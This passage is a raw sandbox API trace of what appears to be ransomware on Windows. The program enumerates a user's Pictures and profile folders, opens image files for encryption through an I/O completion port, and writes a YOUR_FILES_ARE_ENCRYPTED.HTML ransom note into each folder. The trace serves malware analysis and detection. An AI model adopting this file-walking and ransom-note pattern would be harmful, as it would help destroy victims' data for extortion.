[0168.744] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x76302f8 | out: hHeap=0x270000) returned 1 [0168.750] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4e41a60, ftCreationTime.dwHighDateTime=0x1d7e1e8, ftLastAccessTime.dwLowDateTime=0x308c7650, ftLastAccessTime.dwHighDateTime=0x1d7e513, ftLastWriteTime.dwLowDateTime=0x308c7650, ftLastWriteTime.dwHighDateTime=0x1d7e513, nFileSizeHigh=0x0, nFileSizeLow=0xf824, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="oeut8R74cBHG7k.png", cAlternateFileName="OEUT8R~1.PNG")) returned 1 [0168.750] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png") returned 59 [0168.750] lstrcmpW (lpString1="oeut8R74cBHG7k.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.750] PathFindExtensionW (pszPath="oeut8R74cBHG7k.png") returned=".png" [0168.750] lstrlenW (lpString=".png") returned 4 [0168.750] PathFindExtensionW (pszPath="oeut8R74cBHG7k.png") returned=".png" [0168.750] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\oeut8r74cbhg7k.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0168.750] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=63524) returned 1 [0168.750] GetProcessHeap () returned 0x270000 [0168.751] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.751] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0F") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: 
param_1="CE") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="61") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="42") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="93") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="BD") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="42") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CF") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="04") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="05") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AC") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="59") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CF") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="80") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="50") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="59") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="57") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="0E") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E9") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C4") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="7A") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="22") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="65") returned 2 [0168.752] wsprintfW (in: 
param_1=0x4ebda92, param_2="%02X" | out: param_1="33") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2E") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="92") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="0D") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="97") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B7") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="5C") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="65") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="4D") returned 2 [0168.753] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png" [0168.753] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.753] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.753] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7715b7a0, ftCreationTime.dwHighDateTime=0x1d7e444, ftLastAccessTime.dwLowDateTime=0xf34615a0, ftLastAccessTime.dwHighDateTime=0x1d7e506, ftLastWriteTime.dwLowDateTime=0xf34615a0, ftLastWriteTime.dwHighDateTime=0x1d7e506, nFileSizeHigh=0x0, nFileSizeLow=0x1196f, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="WuC6lhh5.bmp", cAlternateFileName="")) returned 1 [0168.753] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\WuC6lhh5.bmp") returned 53 [0168.753] lstrcmpW (lpString1="WuC6lhh5.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.753] PathFindExtensionW (pszPath="WuC6lhh5.bmp") returned=".bmp" [0168.753] lstrlenW (lpString=".bmp") returned 4 [0168.753] PathFindExtensionW (pszPath="WuC6lhh5.bmp") returned=".bmp" [0168.753] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7715b7a0, ftCreationTime.dwHighDateTime=0x1d7e444, ftLastAccessTime.dwLowDateTime=0xf34615a0, ftLastAccessTime.dwHighDateTime=0x1d7e506, ftLastWriteTime.dwLowDateTime=0xf34615a0, ftLastWriteTime.dwHighDateTime=0x1d7e506, nFileSizeHigh=0x0, nFileSizeLow=0x1196f, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="WuC6lhh5.bmp", cAlternateFileName="")) returned 0 [0168.753] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.753] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0168.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0168.754] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.755] CloseHandle (hObject=0x590) returned 1 [0168.756] GetProcessHeap () returned 0x270000 [0168.756] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) 
returned 1 [0168.758] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.758] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\desktop.ini") returned 44 [0168.758] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.758] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.758] lstrlenW (lpString=".ini") returned 4 [0168.758] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.758] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1757e2f0, ftCreationTime.dwHighDateTime=0x1d7dcc6, ftLastAccessTime.dwLowDateTime=0xb56d4b90, ftLastAccessTime.dwHighDateTime=0x1d7defd, ftLastWriteTime.dwLowDateTime=0xb56d4b90, ftLastWriteTime.dwHighDateTime=0x1d7defd, nFileSizeHigh=0x0, nFileSizeLow=0xc548, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="I6ptmqC.gif", cAlternateFileName="")) returned 1 [0168.758] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif") returned 44 [0168.758] lstrcmpW (lpString1="I6ptmqC.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.758] PathFindExtensionW (pszPath="I6ptmqC.gif") returned=".gif" [0168.758] lstrlenW (lpString=".gif") returned 4 [0168.758] PathFindExtensionW (pszPath="I6ptmqC.gif") returned=".gif" [0168.758] SystemFunction036 (in: 
RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\i6ptmqc.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0168.759] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=50504) returned 1 [0168.759] GetProcessHeap () returned 0x270000 [0168.759] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.762] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="3C") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="74") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="4E") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="04") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="E9") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AD") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="41") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="2A") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C5") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F1") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="7C") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C2") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="9B") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="C1") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd7a, 
param_2="%02X" | out: param_1="4F") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="4F") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2D") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="02") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="09") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="2B") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="C9") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="1C") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="14") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C7") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="CF") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="22") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="3A") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="4A") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="17") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="0E") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="D5") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="6F") returned 2 [0168.764] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif" [0168.764] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) 
returned 0x3a0 [0168.764] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.764] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d07050, ftCreationTime.dwHighDateTime=0x1d7e31b, ftLastAccessTime.dwLowDateTime=0x61109380, ftLastAccessTime.dwHighDateTime=0x1d7e511, ftLastWriteTime.dwLowDateTime=0x61109380, ftLastWriteTime.dwHighDateTime=0x1d7e511, nFileSizeHigh=0x0, nFileSizeLow=0x7ef0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="o Q0Lm6h x34YXy.bmp", cAlternateFileName="OQ0LM6~1.BMP")) returned 1 [0168.764] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\o Q0Lm6h x34YXy.bmp") returned 52 [0168.764] lstrcmpW (lpString1="o Q0Lm6h x34YXy.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.764] PathFindExtensionW (pszPath="o Q0Lm6h x34YXy.bmp") returned=".bmp" [0168.764] lstrlenW (lpString=".bmp") returned 4 [0168.764] PathFindExtensionW (pszPath="o Q0Lm6h x34YXy.bmp") returned=".bmp" [0168.764] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="YS-I5C~1.PNG")) returned 1 [0168.764] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png") returned 52 [0168.764] lstrcmpW (lpString1="Ys-I5cZz8VrpRcO.png", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.764] PathFindExtensionW (pszPath="Ys-I5cZz8VrpRcO.png") returned=".png" [0168.764] lstrlenW (lpString=".png") returned 4 [0168.764] PathFindExtensionW (pszPath="Ys-I5cZz8VrpRcO.png") returned=".png" [0168.764] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\ys-i5czz8vrprco.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.765] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=85386) returned 1 [0168.765] GetProcessHeap () returned 0x270000 [0168.765] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759008 [0168.768] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="A0") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="0C") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="75") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="CE") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="8E") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AD") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="87") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A8") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="AD") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0F") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="F5") returned 2 [0168.768] wsprintfW 
(in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="EE") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="47") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="5C") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="7A") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="BF") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="82") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="1C") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="70") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="88") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="8B") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="EB") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="FB") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="10") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="95") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="C6") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="9E") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="21") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="C3") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1F") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FA") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5F") returned 2 [0168.769] lstrcpyW (in: lpString1=0x77690bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png" [0168.770] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7759008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.770] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759008, lpOverlapped=0x7759008) returned 1 [0168.770] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="YS-I5C~1.PNG")) returned 0 [0168.770] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.770] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0168.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.770] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.772] CloseHandle (hObject=0x5a0) returned 1 [0168.772] 
GetProcessHeap () returned 0x270000 [0168.773] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.773] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0168.773] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood") returned 33 [0168.773] GetProcessHeap () returned 0x270000 [0168.773] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.773] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood" [0168.773] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood\\*" [0168.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.773] GetProcessHeap () 
returned 0x270000 [0168.774] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.774] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 1 [0168.774] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent") returned 30 [0168.774] GetProcessHeap () returned 0x270000 [0168.774] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.774] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent" [0168.774] lstrcatW (in: 